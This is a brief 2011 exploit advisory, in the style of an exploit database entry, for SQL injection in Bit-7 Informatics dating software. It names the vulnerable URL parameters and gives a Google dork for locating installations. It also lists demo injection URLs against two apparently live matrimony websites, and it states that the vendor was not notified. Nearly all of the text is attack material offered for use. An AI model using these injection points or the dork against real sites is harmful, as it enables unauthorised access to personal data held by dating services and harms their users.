Bit-7 Informatics suffers from a remote SQL injection vulnerability.
050c73f26c943a43ab0afb48da1330195ecd18b193281a4253d6338131706afe
Bit-7 Informatics SQL Injection Vulnerability
----------------------------------------------------
####
# Author : Yassin Aboukir
# E-mail : 01xp01@gmail.com
# Web : Www.Yaboukir.Com
####
----------------------------------------------------
####
# Title : Bit-7 Informatics SQL Injection Vulnerability
# Name : Bit-7 Informatics
# Description : Advanced india online dating software
# Homepage : http://www.bit7informatics.com/
# Google Dork : "Powered by: Bit-7 Informatics" & "inurl:SearchResult.asp?mode=rel"
# Date : 17/08/2011
# Notified : Unnotified
# Tested on : [Windows Seven Edition Intégral- French]
# Category : Webapps
####
####
#
# Greetz : Caddy-Dz for his found on the same software (Bit-7 Informatics Auth Bypass), Ayoub Aboukir (Ethical Hacker).
#
###
[+] Explo!t3 :
http://localhost/profile.asp?id=[SQLi]
http://localhost/SearchResult.asp?mode=rel&religion=[SQLi]
[+] Desmos :
http://saathipoint.com/profile.asp?id=SP81356'
http://humsafarmatrimony.com/profile.asp?id=HS97467'
Or
http://saathipoint.com/SearchResult.asp?mode=rel&religion=Sikh'
http://humsafarmatrimony.com/SearchResult.asp?mode=rel&religion=Sikh'
G00d Luck All PPl ;)